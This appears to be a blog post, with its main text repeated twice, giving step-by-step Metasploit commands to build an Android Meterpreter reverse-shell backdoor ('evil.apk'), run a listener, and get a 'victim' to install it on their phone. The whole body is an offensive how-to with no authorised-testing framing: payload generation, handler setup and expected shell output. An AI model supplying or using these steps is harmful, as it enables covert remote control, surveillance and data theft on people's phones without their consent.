THINGS WE NEED :-
1)KALI LINUX {OR} BACKTRACK
2)METERPRETER
NOW LETS GET STARTED ...............
PROCEDURE :-
1) Open a terminal and type:
msfconsole
2) now open an another terminal and type:
msfpayload android/meterpreter/reverse_tcp LHOST=your ip address LPORT=81 R > evil.apk
note:- this file evil.apk is an backdoor virus file it should be implanted in the victim's android phone
3) now, get back to the first terminal witch has msfconsole running in it
and type :::
msf > use multi/handler
4)then type:
msf > exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
5)now type
msf exploit(handler) > set LHOST your ip address
and
msf exploit(handler) > set LPORT 81
then type
msf exploit(handler) > exploit
location:-
places===>home folder====>evil.apk
when you hit enter after typing exploit you will see like this
[*] started reverse handler on your ip address
[*] started the payload handler...
now the you have to make sure that the victim should click the file(evil.apk)
when you will sucessefully hack into it you will see
meterpreter >
to get meterpreter best commnads go to
http://letsgohackers.blogspot.in/2014/05/best-meterpreter-commands.html
1)KALI LINUX {OR} BACKTRACK
2)METERPRETER
NOW LETS GET STARTED ...............
PROCEDURE :-
1) Open a terminal and type:
msfconsole
2) now open an another terminal and type:
msfpayload android/meterpreter/reverse_tcp LHOST=your ip address LPORT=81 R > evil.apk
note:- this file evil.apk is an backdoor virus file it should be implanted in the victim's android phone
3) now, get back to the first terminal witch has msfconsole running in it
and type :::
msf > use multi/handler
4)then type:
msf > exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
5)now type
msf exploit(handler) > set LHOST your ip address
and
msf exploit(handler) > set LPORT 81
then type
msf exploit(handler) > exploit
location:-
places===>home folder====>evil.apk
when you hit enter after typing exploit you will see like this
[*] started reverse handler on your ip address
[*] started the payload handler...
now the you have to make sure that the victim should click the file(evil.apk)
when you will sucessefully hack into it you will see
meterpreter >
to get meterpreter best commnads go to
http://letsgohackers.blogspot.in/2014/05/best-meterpreter-commands.html
Comments
Post a Comment